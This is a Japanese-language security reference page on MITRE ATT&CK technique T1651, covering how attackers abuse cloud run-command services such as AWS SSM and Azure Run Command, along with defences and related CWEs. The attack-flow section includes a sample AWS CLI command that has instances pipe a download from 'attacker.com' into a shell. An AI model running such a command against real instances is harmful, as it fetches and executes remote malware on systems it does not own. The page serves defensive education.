Trusted Design

T1651 - Cloud Administration Command

概要

Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)

If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a Trusted Relationship to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)

管理者によるコメント

T1651「Cloud Administration Command」（クラウド管理コマンド） は、攻撃者がクラウドプロバイダー（AWS, Azure, GCPなど）が提供する正規の管理サービスやエージェントを利用して、クラウド上の仮想マシン（VM）内部でコマンドを実行する手法です。

OSの脆弱性を突くのではなく、「クラウドの便利な管理機能」を乗っ取って裏口として使うのが特徴です。

1. 概要

この手法で攻撃者は、「ネットワーク的な隔離を飛び越えた、OS内部への直接操作」を実現します。

何を実現できるのか

• 認証のバイパス:
  SSHキーやパスワードを知らなくても、クラウドの権限（IAM）さえあればOSにログインせずにコマンドを実行できます。

• 隔離環境への侵入:
  踏み台サーバー（バ bastion）を通らなければアクセスできない「プライベートサブネット」内のサーバーに対しても、クラウドの管理網経由で直接命令を送れます。

• 検知の回避:
  正規のエージェント（SSM Agentなど）が実行するため、不審なネットワーク接続として検知されにくくなります。

2. 攻撃の流れ

攻撃者は、まずクラウド管理コンソールやCLIを操作できる権限を入手する必要があります。

1. 管理権限の奪取:
   フィッシングや設定ミスにより、アクセスキー（AK/SK）や、特定の管理権限（例：ssm:SendCommand）を持つIAMロールを盗み取ります。

2. 管理サービスの利用:
   各クラウドが提供するコマンド実行機能を呼び出します。

   • AWS: Systems Manager (SSM) の「Run Command」を利用。
   • Azure: 「Run Command」機能、または「Custom Script Extension」を利用。
   • GCP: 「OS Config」や「Compute Engine Guest Attributes」を利用。

3. コマンドの送信:
   

   • 例 (AWS CLI): aws ssm send-command --instance-ids "i-xxxxxxxx" --document-name "AWS-RunShellScript" --parameters 'commands=["curl [http://attacker.com/malware](http://attacker.com/malware) | sh"]'

4. OS内部での実行:
   VM内で動いている正規の管理エージェントが、クラウドからの命令を「正しい指示」として受け取り、rootやSYSTEM権限で実行します。

3. 防御・対策

「クラウド側の権限」と「OS側のエージェント」の両面で対策が必要です。

• IAM権限の厳格な制限:
  仮想マシンに対してコマンドを送る権限（例：ssm:SendCommand）を、必要最小限のユーザーやロールだけに制限します。

• MFA（多要素認証）の強制:
  管理コマンドを発行できるアカウントには必ずMFAを適用し、キーの漏洩だけで攻撃が成立しないようにします。

• 実行ログの集約:
  クラウドの監査ログ（CloudTrailなど）と、OS内のエージェント実行ログを両方監視し、「誰がいつ、どのサーバーに何のコマンドを送ったか」を追跡可能にします。

• 条件付きアクセスの利用:
  特定のIPアドレス（社内VPNなど）からのみ管理コマンドを発行できるように制限します。

4. 重要ポイント

• 「Living off the Cloud」:
  攻撃者は自前のツールを持ち込む前に、クラウド自体が提供する「正規の機能」を武器として最大限に利用します。

• 管理網の悪用:
  OSのファイアウォール（セキュリティグループ）でポートをすべて閉じていても、この管理機能は「内側からクラウドへ通信するエージェント」を介するため、攻撃を防げません。

5. 関連する主なCWE

• CWE-285: Improper Authorization:
  IAMポリシーの設定ミスにより、本来権限を持つべきでないユーザーに管理コマンドの実行を許してしまう不備。

• CWE-250: Execution with Unnecessary Privileges:
  管理エージェントが常に最高権限で動作しているため、一度命令を送り込まれると被害が甚大になる構造的な問題。

6. 関連する代表的な事例

• Capital Oneのデータ漏洩 (2019年):
  直接のT1651ではありませんが、SSRF（サーバー側リクエスト偽造）を介してクラウドの認証情報を盗み、その後の操作に繋げた事例として、クラウド管理機能の悪用がいかに強力かを知らしめました。

• 高度標的型攻撃 (APT):
  多くのAPTグループが、侵入後の横展開や情報窃取の際に、既存の監視に引っかかりやすいSSHやRDPの代わりに、クラウドネイティブな管理コマンドを隠れ蓑として利用するようになっています。

実務上のアドバイス

もしAWSを使っているなら、「AmazonSSMFullAccess」 などの強力なポリシーを不用意にユーザーに付与していないか今すぐ確認してください。この権限一つで、ネットワーク的に隔離されているはずの全サーバーのOSを完全にコントロールされてしまうリスクがあります。

分析

この攻撃手法を利用する脅威アクター

• Contagious Interview

関連する CVE

この攻撃手法に関連する CVE は登録されていません。

攻撃手法 – 脅威アクター Graph

---

← Technique一覧に戻る ← Tactics一覧に戻る